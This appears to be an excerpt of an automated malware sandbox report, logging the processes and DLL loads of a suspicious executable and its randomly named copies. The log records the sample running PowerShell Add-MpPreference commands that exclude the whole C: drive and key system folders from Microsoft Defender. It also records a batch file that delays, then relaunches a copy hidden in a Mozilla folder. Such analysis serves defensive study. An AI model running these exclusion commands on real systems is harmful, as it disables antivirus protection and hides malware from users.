Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat" Jump to behavior
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
